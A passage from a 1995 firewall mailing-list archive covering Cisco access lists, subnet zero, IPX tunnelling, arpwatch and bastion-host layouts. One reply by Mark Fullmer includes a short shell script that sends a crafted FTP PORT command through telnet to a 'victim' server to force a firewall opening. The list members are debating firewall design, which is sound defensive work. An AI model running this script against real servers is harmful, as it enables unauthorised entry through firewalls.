be run using UDP. > > Given general attitudes towards UDP through firewalls I'm a little > troubled by this. Would the general concensus here be to not do it? > Would there be easy ways of improving this ? eg have some proxyish sort of > thing which accepts UDP and squirts out TCP for passing thro' the fw? > > Furthermore .. what are the implications of letting IPX through. Should > this traffic be filtered in anyway ? If it makes any difference, and I'm > not at all convinced it does, our plan will be to run it through modems > and/or ISDN. I guess that will have to go through some sort of Terminal > Server. I suppose if we do let IPX through like this, then we could > effectively use the Internet as our connection medium for an IPX based > VPN?? Actually, thinking on .. we plan to connect our LANs between this > site and our new one using Kilostream links. We'll use ISDN as a backup. > I think there are thoughts about using a product by Novell - I forget its > name. I suspect that won't combine with the firewall too well. So my > idea would be to firewall the lot and, as I say, tunnel the IPX through > it. > > Any comments ? > Thanks .. Danny > Although it may turn out to be trivial compared to other concerns, you may want to consider performance and bandwidth requirements. Have you considered Novell's IP as an alternative to tunnelling IPX? Perhaps that is the Novell product whose name you forgot. In re: ISDN, I don't believe that it matters that the higher level protocol is IPX or IP. More than likely, you will be incapusulating the lower level packets in PPP anyway. **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Sat Oct 14 10:43:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA02770 for firewalls-outgoing; Sat, 14 Oct 1995 10:40:15 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA02763 for ; Sat, 14 Oct 1995 10:40:12 -0700 Received: by wabash.iac.net id NAA14730; Sat, 14 Oct 1995 13:37:10 -0400 Date: Sat, 14 Oct 1995 13:37:08 -0400 (EDT) From: Carl Jolley To: Scott Surguine cc: firewalls@GreatCircle.COM, surguine@teal.csn.net Subject: Re: Question: Telnet & Packet Filtering In-Reply-To: <199510132230.QAA11994@teal.csn.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you only have two interfaces on your internet router, i.e. to your internal network and the other a serial interface to the Internet or a LAN interface to an isolated subnet that connects to the Internet, then it doesn't matter between filtering input vs. output since the input at both ports is output at the other. Filtering input on the port that connects to the Internet is the same as filtering output at the port that connects to your internal network. The logical reverse holds true for output filtering. **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** On Fri, 13 Oct 1995, Scott Surguine wrote: > > Hello Folks, > > > I am trying to build a packet filter on a Cisco 2501 running IOS 10.2: > > > I would like to allow telnet OUTGOING ONLY accross the Cisco. Which is > the best way to accomplish this? > > > > I) Scenarion #1 > > interface serial0 > ip address XXX.XXX.XXX.XX XXX.XXX,XXX.X > ip access-group 100 in > > > access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255 > established > > > > II) Scenario #2 > > interface serial0 > ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X > ip access-group 100 in > > access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255 > gt 1023 established > > > > > > What is confusing me is this: I have mainly in the past only used > router platforms that filtered on the outgoing interface. I believe > the second Scenario to be the better of the two but would prefer > a second opinion. > > > > My *humble* Thanks, > > > Scott Surguine > surguine@csn.net > From firewalls-owner Sat Oct 14 10:57:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA02789 for firewalls-outgoing; Sat, 14 Oct 1995 10:42:29 -0700 Received: from wabash.iac.net (wabash.iac.net [198.180.60.138]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA02782 for ; Sat, 14 Oct 1995 10:42:25 -0700 Received: by wabash.iac.net id NAA14758; Sat, 14 Oct 1995 13:40:01 -0400 Date: Sat, 14 Oct 1995 13:39:58 -0400 (EDT) From: Carl Jolley To: Paul Ferguson cc: Scott Surguine , firewalls@GreatCircle.COM, surguine@teal.csn.net Subject: Re: Question: Telnet & Packet Filtering In-Reply-To: <199510140029.RAA11440@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 13 Oct 1995, Paul Ferguson wrote: > > Do you _really_ want to block _all_ incoming traffic? Half of your > services, figuratively speaking, will cease to function if you do so. > > Example(s): > > o Do you rely on a service provider for secondary DNS? If yes, > then you'll need to leave tcp/53 incoming open for zone transfers. > > o Do run FTP in PASV mode? If not, then you'll need to allow > tcp ports > 1023 open for FTP connection back-channel data > streams. > > o Do you expect to recieve e-mail? If so, then you'll need to > allow tcp/25 to your mail host(s). > Perhaps he's planning on implementing write-only e-mail. (:-D) > > There are several other examples, but hopefully you see the point > I am trying to make. Make sure this is _exactly_ what you want to > do before you actually do it. > > - paul > > > > > I am trying to build a packet filter on a Cisco 2501 running IOS 10.2: > > > > I would like to allow telnet OUTGOING ONLY accross the Cisco. Which is > > the best way to accomplish this? > > > > I) Scenarion #1 > > > > interface serial0 > > ip address XXX.XXX.XXX.XX XXX.XXX,XXX.X > > ip access-group 100 in > > > > access-list 100 permit tcp 0.0.0.0 255.255.255.255 XXX.XXX.XXX.X 0.0.0.255 > > established > > > > II) Scenario #2 > > > > interface serial0 > > ip address XXX.XXX.XXX.XX XXX.XXX.XXX.X > > ip access-group 100 in > > > > access-list 100 permit tcp 0.0.0.0 255.255.255.255 206.104.1.0 0.0.0.255 > > gt 1023 established > > > > What is confusing me is this: I have mainly in the past only used > > router platforms that filtered on the outgoing interface. I believe > > the second Scenario to be the better of the two but would prefer > > a second opinion. > > > > -- > Paul Ferguson || || > cisco Systems || || > Consulting Engineering |||| |||| > pferguso@cisco.com ..:||||||:..:||||||:.. > c i s c o S y s t e m s > **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Sat Oct 14 13:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA04485 for firewalls-outgoing; Sat, 14 Oct 1995 12:50:49 -0700 Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA04478 for ; Sat, 14 Oct 1995 12:50:47 -0700 Received: (pst@localhost) by puli.cisco.com (8.6.8+c/8.6.5) id MAA14503; Sat, 14 Oct 1995 12:48:45 -0700 Date: Sat, 14 Oct 1995 12:48:45 -0700 From: Paul Traina Message-Id: <199510141948.MAA14503@puli.cisco.com> To: pferguso@cisco.com (Paul Ferguson) Cc: firewalls@greatcircle.com In-Reply-To: pferguso@cisco.com's message of 13 Oct 1995 04:34:35 PST Subject: Re: First and last subnet ??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It depends. If you are using a classless routing protocol, you can certainly use these subnets. If you are using a classful routing protocol, then it depends on the vendor platform and if they have a mechanisn that supports explicit use of these subnets. A word of caution is needed, however, since using them is not RFC compliant. :-) - paul Actually, I got that changed in router requirements RFC. We (the IETF) officially depricated the reserved status of the all zero's and all one's subnets in a "classless" environment. So, it's official now. We currently warn people if they try to assign an interface to an "all zeros" subnet because most other router vendors don't properly handle classFUL routing protocols like RIP in this situation...in fact, we can't guarantee that we'll always do exactly the right thing (it can be hard to figure out). To disable the warning, just configer "ip subnet-zero" and the router will let you configure subnet zero addresses. (hmmm, I should hang that on ip classless too...type type type...). - other paul From firewalls-owner Sat Oct 14 14:13:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05185 for firewalls-outgoing; Sat, 14 Oct 1995 14:04:53 -0700 Received: from zeus.ci.ua.pt (zeus.ci.ua.pt [193.136.80.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA05178 for ; Sat, 14 Oct 1995 14:04:48 -0700 Received: by zeus.ci.ua.pt (1.37.109.16/16.2) id AA138656696; Sat, 14 Oct 1995 21:38:16 GMT From: Fernando Cozinheiro Message-Id: <199510142138.AA138656696@zeus.ci.ua.pt> Subject: ARPWatch under FreeBSD To: firewalls@GreatCircle.COM Date: Sat, 14 Oct 1995 21:38:16 +0000 (PWT) Cc: cooker@zeus.ci.ua.pt (Fernando Cozinheiro) Organization: Universidade de Aveiro, Portugal X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 884 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear friends: Few days ago, I've seen on this mailing list several references about AprWatch, and I've tried to install it under FreeBSD. After small modifications on the program, I've succeeded to compile it. Whenever I run it, appears messages like "arpwatch: pcap open: /dev/bpf0: Device not configured" on the syslog output file. Does anyone already succeeded to use ArpWatch program, under FreeBSD? -- Fernando Cozinheiro http://sweet.ua.pt/~cooker/ System & Network Administrator Email: cooker@ci.ua.pt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Universidade de Aveiro Phone: Centro de Informatica UA: +351 34 370200/Ext.2254 3810 Aveiro CIUA: +351 34 370345 Portugal Telefax: +351 34 370214 From firewalls-owner Sat Oct 14 18:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA08342 for firewalls-outgoing; Sat, 14 Oct 1995 18:24:38 -0700 Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA08335 for ; Sat, 14 Oct 1995 18:24:34 -0700 Received: by mickey.ovid.com (8.6.12/3.1.090690-Ovid Technologies) id BAA23196; Sun, 15 Oct 1995 01:19:09 GMT Date: Sat, 14 Oct 1995 19:19:09 -0600 (MDT) From: Adam Prato To: Fernando Cozinheiro cc: firewalls@GreatCircle.COM, Fernando Cozinheiro Subject: Re: ARPWatch under FreeBSD In-Reply-To: <199510142138.AA138656696@zeus.ci.ua.pt> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 14 Oct 1995, Fernando Cozinheiro wrote: > Date: Sat, 14 Oct 1995 21:38:16 +0000 (PWT) > From: Fernando Cozinheiro > To: firewalls@GreatCircle.COM > Cc: Fernando Cozinheiro > Subject: ARPWatch under FreeBSD > > Dear friends: > > Few days ago, I've seen on this mailing list several references about > AprWatch, and I've tried to install it under FreeBSD. After small > modifications on the program, I've succeeded to compile it. > > Whenever I run it, appears messages like "arpwatch: pcap open: > /dev/bpf0: Device not configured" on the syslog output file. Does > anyone already succeeded to use ArpWatch program, under FreeBSD? Perhaps you need to recompile your kernel with the following: pseudo-device bpfilter 4 #Berkeley packet filter -arp From firewalls-owner Sat Oct 14 22:00:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10570 for firewalls-outgoing; Sat, 14 Oct 1995 21:52:32 -0700 Received: from risc.agsm.ucla.edu (risc.agsm.ucla.edu [164.67.163.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA10563 for ; Sat, 14 Oct 1995 21:52:30 -0700 Received: by risc.agsm.ucla.edu id AA28034 (5.67a/IDA-1.5 for firewalls@greatcircle.com); Sat, 14 Oct 1995 21:50:44 -0700 From: Tom Kozlowski Message-Id: <199510150450.AA28034@risc.agsm.ucla.edu> Subject: form recognition within WWW? To: firewalls@greatcircle.com Date: Sat, 14 Oct 1995 21:50:43 -0800 (PDT) X-Mailer: ELM [version 2.4 PL22] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 469 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Any words of wisdom would be appreciated on this matter. I am having problems with recognizing forms when using Netscape browser 1.1N. For example,
doesn't work for me. I am simply being refused login access in the above case. For your information, with my Netscape browser I am going through a firewall running CERN Web proxy server. Could this be related somehow to my firewall setup? Many thanks in advance! Tom K. From firewalls-owner Sat Oct 14 23:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA11696 for firewalls-outgoing; Sat, 14 Oct 1995 23:19:21 -0700 Received: from locust.net.ohio-state.edu (mail.net.ohio-state.edu [128.146.222.110]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA11689 for ; Sat, 14 Oct 1995 23:19:18 -0700 Received: from bedbugs.net.ohio-state.edu (bedbugs [128.146.222.2]) by locust.net.ohio-state.edu (8.6.12/8.6.9) with ESMTP id CAA08785; Sun, 15 Oct 1995 02:15:46 -0400 Received: (from maf@localhost) by bedbugs.net.ohio-state.edu (8.6.12/8.6.9) id CAA06078; Sun, 15 Oct 1995 02:15:40 -0400 From: "Mark A. Fullmer" Message-Id: <199510150615.CAA06078@bedbugs.net.ohio-state.edu> Subject: Re: Various FTPs To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security) Date: Sun, 15 Oct 1995 02:15:40 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9510130120.AA18104@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Oct 12, 95 09:20:04 pm Reply-To: maf@net.ohio-state.edu X-Mailer: ELM [version 2.4 PL24 PGP1] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1271 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A. Padgett Peterson, P.E. Information Security writes: > >I agree with Marcus concerning the probloms in FTP & possibly IPV6 >will repair/replace it. For now I suspect that the answer is a >Firewall that will only allow an Inward port 20 connection if >the inside node already had a port 21 outward connection (No, I >do not mean via "established" I mean the firewall should beep track >of what connections exist). If Victim is inside the firewall, all Attacker needs to do is coerce Victim to initiate an outgoing connection to port 21 which then opens up the firewall. If Victim has an anonymous FTP server running, and the firewall allows a connection, this is just too easy: #!/bin/sh # replace A.B.C.D with your IPAddr echo " user anonymous pass foo@bar.com port A,B,C,D,0,21 list quit " | telnet victim 21 Set your srcPort to 20 and you're in, minimally to dstPort >= 1024. Opening a back channel for FTP also implies trusting random FTP servers on the Internet and the path to those servers. With point and click web pages that open connections who knows where, most people probably have no idea they just made a FTP connection to evil.hacker.site.com that starts up a XscreenDump script back to all anonymous FTP users' machines. -- mark maf+@osu.edu From firewalls-owner Sun Oct 15 08:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17481 for firewalls-outgoing; Sun, 15 Oct 1995 08:17:33 -0700 Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA17474 for ; Sun, 15 Oct 1995 08:17:28 -0700 Received: from csa063.emirates.net.ae by ns2.emirates.net.ae (5.x/SMI-SVR495081401) id AA02856; Sun, 15 Oct 1995 19:15:37 +0400 Date: Sun, 15 Oct 1995 19:15:36 +0400 Message-Id: <9510151515.AA02856@ns2.emirates.net.ae> X-Sender: forster@emirates.net.ae (Unverified) X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: forster@ns2.emirates.net.ae (Andrew & Terri Forster) Subject: Courtney & NetStalker Software Cc: frankw@in.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sources of Courtney & NetStalker Software I have recently read about these products and I haven't been successful in locating an ftp or www site to access them or more info. Can anyone assist me. Contact me direct if you feel your response isn't required by others. Thanks in Advance AMF ========================================================================== Andrew M Forster Email: forster@emirates.net.ae Phone: +9712 262556 or +9712 453613 Fax: +9712 465344 ========================================================================== From firewalls-owner Sun Oct 15 12:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20104 for firewalls-outgoing; Sun, 15 Oct 1995 12:26:57 -0700 Received: from odin.community.net (odin.community.net [140.174.119.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA20097 for ; Sun, 15 Oct 1995 12:26:52 -0700 Received: from [140.174.226.108] (n108.coco.community.net [140.174.226.108]) by odin.community.net with SMTP id MAA07841 for ; Sun, 15 Oct 1995 12:24:20 -0700 Date: Sun, 15 Oct 1995 12:24:20 -0700 Message-Id: <199510151924.MAA07841@odin.community.net> Subject: Re: Firewall1 Comparison -Reply From: Bill Husler To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our local SunSoft rep just gave us a presentation on FW-1 and it seems that FW-1 allows you to manage Cisco routers as well as FW-1 Filters (for application gatewat and Dynamic packet filtering). This would provide both levels and on separate boxes while centralizing administration. Sound kinda cool. Bill >FW-1 includes application gateways for FTP and telnet while doing >everything else with a dynamic packet filtering scheme. This puts >both on the same hardware. > >It is common to use a router in conjuction with a host running an >application gateway. If you put access lists into the router, you are >now running packet filters and application gateways. > The opinions expressed here-in are my own. Any similarities between these opinions and those of any other person - living or not - including my employer are purely coincidental. From firewalls-owner Sun Oct 15 14:30:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21834 for firewalls-outgoing; Sun, 15 Oct 1995 14:21:09 -0700 Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.64]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA21827 for ; Sun, 15 Oct 1995 14:20:53 -0700 Received: from post.demon.co.uk by relay-4.mail.demon.net id sg.bs22150; 15 Oct 95 13:01 +0100 Received: from relay-4.mail.demon.net by relay-3.mail.demon.net id aa18831; 15 Oct 95 8:33 +0100 Received: by mntcmp2.demon.co.uk (Smail3.1.28.1 #5) id m0t4NUW-0006zaC; Sun, 15 Oct 95 07:28 GMT Message-Id: From: Jon Whitton Subject: Firewalls To: firewalls@greatcircle.com Date: Sun, 15 Oct 1995 07:28:14 +0000 (GMT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2687 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are planning to have a public access web/ftp site on the outside of a firewall. This machine does not need to be 100% secure. Our internal office net will also be connected to the same leaseline and this net will need to be secure. We plan to use packet filters on the Ciscos and application proxys on the bastion machine: ISP +-----------+ +-----------+ Lease | Cisco | | Bastion | Application proxys ----- | 2501 |----------------------| machine | primary DNS Line | | | | | +-----------+ | +-----------+ | | +-----------+ | | ftp/web | Insecure |-----------| machine | Public | | | Access machine | +-----------+ | +-----------+ | Cisco | Dual Homed | 2514 | Gateway | | +-----------+ | | -------------------|------------------------ Secure Internal | | | TCP/IP Network +-----------+ +-----------+ +-----------+ | Machine | | Machine | ..... | Machine | | 1 | | 2 | | n | The bastion will also be the primary DNS machine and have our main hostname (something like mntcmp.co.uk). My query is where can the ftp/web server be placed so that the traffic does not need to go via the bastion machine. Obviously we need to keep the web/ftp server as fast as possible, hence the requirement for it not to receive/TX traffic via the bastion. Is this possible? I believe the Cisco 2501 can only route to one designated machine (bastion). Is this correct? If so can we use a different Cisco to route ftp/www traffic directly to the ftp/www server and all other traffic to the bastion? Would this be a solution? There will be no requirement for http to/from the secure office net. So a routing solution maybe possible? TIA, Jon. -- ================================================================================ Jon Whitton. Internet Address: jonw@mntcmp2.demon.co.uk ================================================================================ -- From firewalls-owner Sun Oct 15 15:00:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22591 for firewalls-outgoing; Sun, 15 Oct 1995 14:55:29 -0700 Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA22584 for ; Sun, 15 Oct 1995 14:55:25 -0700 Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id OAA28030; Sun, 15 Oct 1995 14:52:17 -0700 From: Paul Ferguson Message-Id: <199510152152.OAA28030@lint.cisco.com> Subject: Re: Firewalls To: jonw@mntcmp2.demon.co.uk (Jon Whitton) Date: Sun, 15 Oct 95 14:52:17 PDT Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Jon Whitton" at Oct 15, 95 7:28 am X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > We are planning to have a public access web/ftp site on the outside of a > firewall. This machine does not need to be 100% secure. Our internal office net > will also be connected to the same leaseline and this net will need to be secure. > We plan to use packet filters on the Ciscos and application proxys on the > bastion machine: > > > ISP +-----------+ +-----------+ > Lease | Cisco | | Bastion | Application proxys > ----- | 2501 |----------------------| machine | primary DNS > Line | | | | | > +-----------+ | +-----------+ > | > | +-----------+ > | | ftp/web | Insecure > |-----------| machine | Public > | | | Access machine > | +-----------+ > | > +-----------+ > | Cisco | Dual Homed > | 2514 | Gateway > | | > +-----------+ > | > | > -------------------|------------------------ Secure Internal > | | | TCP/IP Network > +-----------+ +-----------+ +-----------+ > | Machine | | Machine | ..... | Machine | > | 1 | | 2 | | n | > > The bastion will also be the primary DNS machine and have our main hostname > (something like mntcmp.co.uk). > > My query is where can the ftp/web server be placed so that the traffic does > not need to go via the bastion machine. Obviously we need to keep the web/ftp > server as fast as possible, hence the requirement for it not to receive/TX > traffic via the bastion. > > Is this possible? > > I believe the Cisco 2501 can only route to one designated machine (bastion). > Is this correct? If so can we use a different Cisco to route ftp/www traffic > directly to the ftp/www server and all other traffic to the bastion? > Would this be a solution? > > There will be no requirement for http to/from the secure office net. So a > routing solution maybe possible? > Routes, from an external perspective, can be defined to either singular hosts or to entire networks. The latter is the most common. As long as your DNS resolves requests to your WWW/FTP server, it should work fine. I'm sure why you would think that you would need another router to accomplish this. The only 'traffic' that would be going to your DNS host is DNS lookups, which are necessary. :-) - paul > -- Paul Ferguson || || cisco Systems || || Consulting Engineering |||| |||| pferguso@cisco.com ..:||||||:..:||||||:.. c i s c o S y s t e m s From firewalls-owner Sun Oct 15 17:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24459 for firewalls-outgoing; Sun, 15 Oct 1995 16:52:22 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24452 for ; Sun, 15 Oct 1995 16:52:16 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA00874; Mon, 16 Oct 1995 09:45:35 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma000872; Mon Oct 16 09:45:27 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA03639; Mon, 16 Oct 1995 09:51:29 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510152351.AA03639@citecub.citec.qld.gov.au> Subject: Re: Various FTPs To: matt@uts.EDU.AU (Jas) Date: Mon, 16 Oct 95 9:51:28 EST Cc: firewalls@greatcircle.com In-Reply-To: <199510131806.EAA04335@lordmuck.itd.uts.edu.au>; from "Jas" at Oct 14, 95 4:06 am X-Mailer: ELM [version 2.3 PL11] content-length: 1000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, My mailer thinks Jas said: > > Scott Barman wrote this... > > > On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote: > > >> I agree with Marcus concerning the probloms in FTP & possibly IPV6 > >> will repair/replace it. For now I suspect that the answer is a > > > I have been "observing" the output of the IETF for IPv6 and have seen > > nothing regarding changing ftp. It seems their concerns are a larger > > address space and security. I don't think I'm alone in my desire to see > > something replace it and, as Marcus Ranum said about himself in a previous > > note, I'm not "big" enough to try to force a change! > > well why dont we put our collective heads together and make a firewall > friendly file transfer protocol? then we can have people write up the > code on different platforms (we have enough knowledge here for almost > every possible conceivable platform), and GPL the stuff. well? any > takers? myself personally im in. > Why doesn't PASV do the trick? Colin From firewalls-owner Sun Oct 15 17:13:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA24806 for firewalls-outgoing; Sun, 15 Oct 1995 17:07:16 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA24799 for ; Sun, 15 Oct 1995 17:07:11 -0700 Date: Sun, 15 Oct 1995 20:05:23 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951015200523.2106a541@hobbes.orl.mmc.com> Subject: FTP vulnerabilities Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >If Victim is inside the firewall, all Attacker needs to do is coerce >Victim to initiate an outgoing connection to port 21 which then opens >up the firewall. If Victim has an anonymous FTP server running, and the >firewall allows a connection, this is just too easy: (commands omitted) Wait a moment. First if I allow outward connections only (b) goes away. Second if Joe connects to evil.nasty and I have an intelligent machine, then it will allow evil.nasty to make a back connection only to Joe and only to a port greater than 1023. I can even eliminate that by requiring only PASV connections (how I wound up connecting to Marcus' machine). - If only PASV (passive) connections are allowed, the question will never come up. Why invent something when we already have a fix ? I agree there is a possible vulnerability with std FTP (if Joe is allowing services on ports above 1023, he may be in violation of policy & I will probably notice it in one of my sweeps) but consider it minimal. It is even more minimal if the Firewall enforces an "approved FTP site" list. Warmly, Padgett From firewalls-owner Sun Oct 15 17:20:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24020 for firewalls-outgoing; Sun, 15 Oct 1995 16:47:38 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24013 for ; Sun, 15 Oct 1995 16:47:28 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA00747; Mon, 16 Oct 1995 09:40:34 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma000597; Mon Oct 16 09:40:07 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA02921; Mon, 16 Oct 1995 09:46:07 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510152346.AA02921@citecub.citec.qld.gov.au> Subject: Re: Firewall1 Comparison -Reply To: dkaye@rds.com (Doug Kaye) Date: Mon, 16 Oct 95 9:46:06 EST Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Doug Kaye" at Oct 13, 95 8:34 am X-Mailer: ELM [version 2.3 PL11] content-length: 1606 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, My mailer thinks Doug Kaye said: > > I'm seeing a lot of discussion on pack filters vs. application gateways. Does it make > sense to implement both? Why not? How much do you value the systems and information you are trying to protect? > Is it too expensive or overkill? It isn't the cheapest solution but again, I ask, how much do you value the systems and information you are trying to protect? > If you implement both, where > does the filter go -- on the public side of the application gateway? Is it possible to run both > on the same hardware? The really paranoid amongst us, can implement the following: 'Outside' | | Router with filters | ------------------- | | bastion host with filters and gateways | | ------------------- | | Router with filters | | `Inside' The external router provides spoofing protection and limits incoming traffic to the permitted services (mail, news, a web server on the outer net, ...). The bastion runs application gateways AND filters. The filters provide a way of double-checking the external router. With the same filters installed, a rejected packet on the bastion immediately tells you the filters on the external router have been bypassed. The internal router is the last line of defence. Since we are allowing connections to the bastion from the outside (mail, news, ...) we have to assume that it could/will be compromised. This router slows things down a bit more. Colin From firewalls-owner Sun Oct 15 17:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA25277 for firewalls-outgoing; Sun, 15 Oct 1995 17:24:00 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA25260 for ; Sun, 15 Oct 1995 17:23:50 -0700 Received: by little-miami.iac.net id UAA18783; Sun, 15 Oct 1995 20:22:01 -0400 Date: Sun, 15 Oct 1995 20:21:54 -0400 (EDT) From: Carl Jolley To: Mark Bell cc: Yannick Gravel , firewalls@GreatCircle.COM Subject: Re: First and last subnet ??? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 14 Oct 1995, Mark Bell wrote: > The subnet value - that is the portion of the address that is reserved > for the subnet - cannot be all ones or all zeroes. i.e > > net address 135.148. 0.0 > default netmask 255.255. 0.0 (class B) > subnet mask 0. 0.255.0 > ------------- > netmask 255.255.255.0 > > The third byte cannot be 'all ones' or 'all zeroes'(referring to the > binary subnet value - in this case whats in the 3rd byte). > > 255 (decimal) = 1111 1111 (binary), and obviously > 0 (decimal) = 0000 0000 (binary) > > The subnets 135.148.255.0 and 135.148.0.0 cannot be used. If you have a cisco > router, you may use the 135.148.0.0 subnet, if you set the 'subnet zero' > parameter - see the manual - but note that other routers on the network may > not forward the traffic to 135.148.0.0 if they have a subnet mask of > 255.255.255.0 set for that net. The cause of the problem is RFC950, > (subnetting ip networks) which was written in the days when net addresses > were plentiful. > > If you have a class C address - say 198.143.35.0, and you subnet with a > netmask of 255.255.255.192 (0xff.ff.ff.c0), you theoretically have the > following subnets available: > > 198.143.35.0 ^^^^ And just what is the subnet number of the above network with a mask of 0xff.ff.ff.c0 ? Somehow it looks suspiciously like zero to me. > 198.143.35.64 > 198.143.35.128 > 198.143.35.192 > > Without the 'subnet zero' feature, subnets 198.143.35.0 and 198.143.35.192 > cannot be used. You just lost 50% of the address space. Another feature of IP! > There are other routers with the 'subnet zero' feature available, but I > don't have a list available. > > Hope this helps. > > Mark > Marol Consulting > > On > Wed, 11 Oct 